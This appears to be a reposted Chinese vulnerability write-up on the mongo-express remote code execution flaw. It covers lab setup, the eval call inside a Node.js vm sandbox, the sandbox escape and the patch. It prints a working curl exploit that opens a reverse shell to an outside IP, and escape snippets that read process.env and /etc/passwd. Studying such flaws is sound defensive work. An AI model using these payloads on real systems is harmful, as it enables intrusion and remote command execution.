远程代码执行漏洞实例分析

0x01 认识 mongo-express

mongo-express是一个MongoDB的Admin Web管理界面,使用NodeJS、Express、Bootstrap3编写而成。目前mongo-express应该是Github上Star非常多的MongoDB admin管理界面。部署方便,使用简单,成为了很多人管理mongo的选择。

远程代码执行漏洞实例分析

0x02 调试环境搭建

0x1 启动docker服务

阅读官方GitHub的安全公告,我们发现漏洞影响0.54.0以下的所有版本。选择以0.49为例进行测试,由于此漏洞环境还需要MongoDB数据库,我们可以通过执行以下docker命令进行快速搭建:

  • 搭建MongoDB数据库

docker run –name test -d mongo:3.2

  • 搭建包含漏洞的mongo-express并且连接到上面的MongoDB数据库:

docker run -d -p 8081:8081 –link test:mongo mongo-express:0.49

查看日志,确认连接成功。

远程代码执行漏洞实例分析

0x2 开启nodejs调试选项

这里需要个技巧,如果要调试nodejs 需要在启动的时候加上 –inspect 参数。 在docker启动脚本做以下修改

远程代码执行漏洞实例分析

docker restart 183

利用docker exec -it 183 bash连接docker查看debug服务是否开启

远程代码执行漏洞实例分析

如上图中开启9229端口即可。只需要外面主机能够连接访问9229端口就可以利用chrome插件进行调试,可以用frp将端口转发出来,或者利用docker -p 9229:9229参数做处理。

0x3 Chrome DevTools

利用chrome 插件可以实现像调试javascript脚本一样调试nodejs,操作起来也是很方便。

首先下载debug插件

远程代码执行漏洞实例分析

在chrome打开about:inspect chrome devtools在2016年5月就已经支持Nodejs的调试,点击Open dedicated DevTools for Node

远程代码执行漏洞实例分析

配置连接地址和端口

远程代码执行漏洞实例分析

接下来就像调试js一样了

远程代码执行漏洞实例分析

发送一个测试包,该路由分支可以断下,接下来就开始调试本次漏洞了。



curl http://127.0.0.1:8081/checkValid -d ‘document=this.constructor.constructor(“return process”)().mainModule.require(“child_process”).execSync(“bash -i >& /dev/tcp/192.168.43.176/8003 0>&1 2>&1”)’

远程代码执行漏洞实例分析

0x03 漏洞调试及原理分析

本次调试的漏洞原理比较简单,核心漏洞是命令拼接,这是一种最简单的漏洞形式,但是利用起来需要点功夫,因为需要绕过沙箱VM,好在nodejs的vm绕过有过研究基础。多的不说,直接看最后的漏洞代码

远程代码执行漏洞实例分析

string为toBSON的参数,在MongoDB中BSON是一种常见的数据格式,与JSON是近亲,但是和JSON的数据格式有很多区别,而然在mongo-express中的所有和BSON相关的操作,如新建一个文档(类似其他数据库的插入操作)都需要通过toBSON()函数。

例如下面操作

远程代码执行漏洞实例分析

当代码流程走到bson.toBSON时会触发eval函数,因为nodejs可以作为后端语言所以该eval函数是在服务器端运行,可以造成命令注入,对系统产生危害。



exp.checkValid = function (req, res) {var doc = req.body.document;try { bson.toBSON(doc);} catch (err) { console.error(err); return res.send(‘Invalid’);}res.send(‘Valid’); };


exports.toBSON = function (string) { var sandbox = exports.getSandbox(); string = string.replace(/ISODate(/g, ‘new ISODate(‘); string = string.replace(/Binary((“[^”]+”),/g, ‘Binary(new Buffer($1, “base64”),’); vm.runInNewContext(‘doc = eval((‘ + string + ‘));’, sandbox); return sandbox.doc;};

由代码溯源分析得到,toBSON的参数string是req.body中的document,因此这一部分我们可控。可以发现vm.runInNewContext函数,这是一个虚拟沙箱。因此们下一节分析怎么绕过沙箱防护。

0x04 nodejs 沙箱绕过

沙箱是一个能够安全执行不受信任的代码,且不影响外部实际代码的独立环境。在沙箱里代码执行往往会被限制。VM模块提供在VM虚拟机上下文中编译运行代码的API。使用VM模块可以在沙箱环境中运行代码。运行的代码使用不同的V8上下文,也就是它的全局变量不同于其他代码。但是沙箱里的代码仍然可以访问Node进程。我们经常使用该方法去绕过。

0x1 现象

vm.js



“use strict”;const vm = require(“vm”);const xyz = vm.runInNewContext(`this.constructor.constructor(‘return this.process.env’)()`);console.log(xyz);

远程代码执行漏洞实例分析

可以看到this.process.env获取到了nodejs进程的信息,这说明完全可以切回主程序去执行系统命令。

0x2 解释

在javascript中this指向它所属的对象,所以我们使用它时就已经指向了一个VM上下文之外的对象。那么访问this的 .constructor 就返回 Object Constructor ,访问 Object Constructor 的 .constructor 返回 Function constructor 。 Function constructor 就像javascript里的较高函数它允许全局访问。Function constructor允许从字符串生成函数,从而执行任意代码。所以我们可以利用它返回主进程。之后我们就能用它来访问主进程,然后进行RCE。



“use strict”;const vm = require(“vm”);const xyz = vm.runInNewContext(`const process = this.constructor.constructor(‘return this.process’)();process.mainModule.require(‘child_process’).execSync(‘cat /etc/passwd’).toString()`);console.log(xyz);

同理vm2 函数也可以绕过,这里还是参照原文进行学习吧 https://pwnisher.gitlab.io/nodejs/sandbox/2019/02/21/sandboxing-nodejs-is-hard.html

0x05 漏洞修补

远程代码执行漏洞实例分析

远程代码执行漏洞实例分析

这里放两个图可以说明一切,利用mongo-query-parser 去解析BSON数据,直接从根源替换。

以上就是远程代码执行漏洞实例分析的全部内容了,更多与远程代码执行漏洞实例分析相关的内容可以搜索亿速云之前的文章或者浏览下面的文章进行学习哈!相信小编会给大家增添更多知识,希望大家能够支持一下亿速云!

文章标题:远程代码执行漏洞实例分析,发布者:亿速云,转载请注明出处:https://worktile.com/kb/p/29889

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
亿速云的头像亿速云认证作者
上一篇 2022年9月26日 上午1:53
下一篇 2022年9月26日 上午1:55

相关推荐

  • windows KB4525237安装失败怎么解决

    根据情况不同,小编为大家准备了四种解决方案 名列前茅种方案: 重新下载安装补丁 在我们下载补丁的过程中可能就会遇到文件损坏的情况,所以破损的补丁安装包是无法安装成功的。 这种情况下可以尝试重新下载一个补丁安装包重新安装。 第二种方案: 更新升级最新的.net framework(目前是4.8版本) …

    2022年9月1日
    42200
  • 如何逆向分析Spotify.app并hook其功能获取数据

    项目 该项目的目标是构建一个Spotify客户端,让它能够学习我的听曲习惯并跳过一些我通常会跳过的歌曲。不得不承认,这种需求来自于我的懒惰。我不想在当我有心情想要听某些音乐时,创建或查找播放列表。我希望的是在我的库中选择一首歌,然后可以随机播放其他歌曲,并从队列中删除不“flow(节奏与旋律的流畅)…

    2022年9月8日
    73500
  • 如何利用深度链接方式后门化Facebook APP

    近期,作者发现了Facebook安卓APP应用的一个深度链接漏洞,利用该漏洞,可以把用户手机上安装的Facebook安卓APP应用转变成后门程序(Backdoor),实现后门化。另外,利用该漏洞还可以重打包Facebook APP,并将其发送给特定目标受害者安装使用。下面就来看看作者对该漏洞的发现过…

    2022年9月10日
    77500
  • 基于签名算法且简单安全的API授权机制是什么

    笔者以前在做广告系统时发现对接的大多数平台的广告系统都是以token方式授权接口,而且这个token是一直不变的,由广告主提供,可以说这就是裸奔的接口,只不过这种接口对安全性要求不高,这只能防止恶意调用以及验证渠道的身份。 去年笔者写过一个API统一授权平台,为内部服务开放接口给第三方系统调用提供统…

    2022年9月8日
    62000
  • 如何进行Web渗透技巧分析

    当前,随着信息网络的不断发展,人们的信息安全意识日益提升,信息系统的安全防护措施也逐渐提高,通常都会在服务器的互联网边界处部署防火墙来隔离内外网络,仅仅将外部需要的服务器端口暴露出来。采用这种措施可以大大的提高信息系统安全等级,对于外部攻击者来说,就像关闭了所有无关的通路,仅仅留下一个必要入口。 但…

    2022年9月22日
    52600
  • 如何分析APK安全及自动化审计

    一、 闲聊 说到移动安全,可能大家比较陌生,因为这方面的研究是在最近几年才逐渐火起来的。那么什么是移动安全呢?首先,我们知道,移动安全无非就是ios平台和安卓平台上的一些安全性的问题,包括平台系统系统本身的一些问题和应用层面上的问题。当然在客户端和服务端在进行交互的时候还需要涉及一些通信协议,主要是…

    2022年9月10日
    77300
  • mysql如何查询最大id值

    在mysql中,可以使用SELECT语句配合max()函数来查询最大id值,语法为“SELECT MAX(id) FROM 表名;”。SELECT语句用于查询指定表中数据,而max()函数用于返回查询结果集中指定列中的最大值,语法“MAX(列名)”;而想要获取id列的最大值,max()函数中的参数值…

    2022年9月21日
    3.0K00
  • 如何使用exp进行SQL报错注入

    0x01 前言概述 小编又在MySQL中发现了一个Double型数据溢出。当我们拿到MySQL里的函数时,小编比较感兴趣的是其中的数学函数,它们也应该包含一些数据类型来保存数值。所以小编就跑去测试看哪些函数会出现溢出错误。然后小编发现,当传递一个大于709的值时,函数exp()就会引起一个溢出错误。…

    2022年9月6日
    72500
  • MySQL中的查询优化器怎么用

    对于一个SQL语句,查询优化器先看是不是能转换成JOIN,再将JOIN进行优化 优化分为:1. 条件优化,2.计算全表扫描成本,3. 找出所有能用到的索引,4. 针对每个索引计算不同的访问方式的成本,5. 选出成本最小的索引以及访问方式 一、开启查询优化器日志 — 开启set optimizer_…

    2022年9月15日
    57600
  • windows谷歌浏览器flas如何设置一直允许

    谷歌浏览器flash设置一直允许的方法: 1、进入浏览器,点击右上方的“三个点”。 2、随后点击菜单中的“设置”。 3、进入设置后点击最底部的“高级选项”。 4、随后点击“网站设置”。 5、进入网站设置后点击“flash”。 6、打开flash,将“禁止运行flash”关闭即可。 关于“window…

    2022年9月8日
    46800
注册PingCode 在线客服
站长微信
站长微信
电话联系

400-800-1024

工作日9:30-21:00在线

分享本页
返回顶部